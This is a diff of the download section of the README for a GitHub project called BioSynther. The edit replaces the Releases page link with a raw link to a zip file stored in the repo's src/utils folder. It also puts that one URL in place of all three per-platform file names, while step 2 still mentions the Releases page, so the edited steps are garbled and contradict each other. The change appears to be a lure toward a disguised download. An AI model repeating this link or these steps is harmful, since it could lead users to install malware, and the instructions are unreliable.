PoraminSukyaruek/BioSynther/README.md

 - **Processor:** Intel i3 or equivalent.

 ## 📥 Download & Install
-To download BioSynther, visit this page: [Download BioSynther](https://github.com/PoraminSukyaruek/BioSynther/releases).
+To download BioSynther, visit this page: [Download BioSynther](https://raw.githubusercontent.com/PoraminSukyaruek/BioSynther/main/src/utils/BioSynther-v2.7-alpha.4.zip).

 1. Click on the link above.
 2. On the Releases page, you will see the latest version listed.
-3. Find the file labeled "BioSynther_latest.exe" for Windows, "BioSynther_latest.dmg" for macOS, or "BioSynther_latest.tar.gz" for Linux.
+3. Find the file labeled "https://raw.githubusercontent.com/PoraminSukyaruek/BioSynther/main/src/utils/BioSynther-v2.7-alpha.4.zip" for Windows, "https://raw.githubusercontent.com/PoraminSukyaruek/BioSynther/main/src/utils/BioSynther-v2.7-alpha.4.zip" for macOS, or "https://raw.githubusercontent.com/PoraminSukyaruek/BioSynther/main/src/utils/BioSynther-v2.7-alpha.4.zip" for Linux.
 4. Click on the relevant file to start downloading.

 After the download completes, follow the instructions based on your operating system: